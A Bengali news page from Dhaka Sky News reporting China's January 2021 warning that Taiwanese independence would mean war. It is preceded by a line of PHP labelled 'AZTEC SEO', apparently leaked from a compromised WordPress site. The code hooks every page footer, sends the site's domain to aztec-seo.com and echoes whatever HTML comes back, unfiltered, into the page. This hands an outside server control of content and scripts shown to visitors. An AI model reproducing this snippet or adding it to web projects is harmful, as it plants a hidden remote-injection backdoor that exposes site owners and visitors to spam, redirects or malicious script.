/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); আনুষ্ঠানিকভাবে স্বাধীনতা ঘোষণা করলেই যুদ্ধ হবে তাইওয়ানের সঙ্গে: চীন | Dhaka Sky News

সৌদি ও আমিরাতের কাছে অস্ত্র বিক্রি বন্ধ করতে ইইউ’র প্রতি অ্যামনেস্টির আহ্বান

আগের সংবাদ

আবুধাবিতে আমেরিকা ও আমিরাতের যৌথ মহড়া শুরু

পরের সংবাদ

আনুষ্ঠানিকভাবে স্বাধীনতা ঘোষণা করলেই যুদ্ধ হবে তাইওয়ানের সঙ্গে: চীন

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 29, 2021 , 8:00 pm

আনুষ্ঠানিকভাবে স্বাধীনতা ঘোষণা করলেই তাইওয়ানকে যুদ্ধ মোকাবেলা করতে হবে বলে জানিয়ে দিয়েছে চীন। চীনের প্রতিরক্ষা মন্ত্রণালয়ের মুখপাত্র উ কিয়ান বলেছেন, “আমরা তাইওয়ানের স্বাধীনতাকামীদের সতর্ক করতে চাই। যাঁরা আগুন নিয়ে খেলছেন, আগুন তাঁদের পুড়িয়ে দেবে। তাইওয়ানের স্বাধীনতা মানেই হচ্ছে যুদ্ধ।”

তাইওয়ান সীমান্তে চীনের সাম্প্রতিক সামরিক উপস্থিতির মধ্যেই দেশটিকে কড়া হুঁশিয়ারি দিল চীন। তবে তাইওয়ান এ হুমকির নিন্দা জানিয়েছে।

চীন মনে করে, তাইওয়ান তাদের কাছ থেকে বিচ্ছিন্ন হয়ে যাওয়া একটি প্রদেশ। তাইওয়ান কোনো সময় স্বাধীনতা ঘোষণা করলে চীনের পক্ষ থেকে শক্তিপ্রয়োগের সম্ভাবনার বিষয়টি কখনোই নাকচ করেনি বেইজিং। ১৯৪৯ সাল থেকে চীন ও তাইওয়ান পৃথকভাবে শাসিত হচ্ছে।

তাইওয়ানের সীমানার কাছে চীনের বিমানবাহিনীর সাম্প্রতিক মহড়া প্রসঙ্গে চীনের প্রতিরক্ষা মন্ত্রণালয়ের মুখপাত্র উ কিয়ান এক মাসিক সংবাদ বিফ্রিংয়ে বলেছেন, তাইওয়ান হচ্ছে চীনের অবিচ্ছেদ্য অংশ। তিনি আরও বলেছেন, তাইওয়ান প্রণালিতে বর্তমান নিরাপত্তা পরিস্থিতি পর্যবেক্ষণ ও চীনের জাতীয় সার্বভৌমত্ব ও নিরাপত্তা নিশ্চিত করা জরুরি বলেই সেখানে চীনের পিপলস লিবারেশন আর্মির এসব কর্মকাণ্ড।

মুষ্টিমেয় কিছু লোক তাইওয়ানের স্বাধীনতা দাবি করছে উল্লেখ করে উ বলেন, ‘তাইওয়ান ইনডিপেনডেন্স’ বাহিনীর উসকানি ও বিদেশি হস্তক্ষেপের পরিপ্রেক্ষিতে এ পদক্ষেপ নেওয়া হয়েছে। সূত্র : পার্সটুডে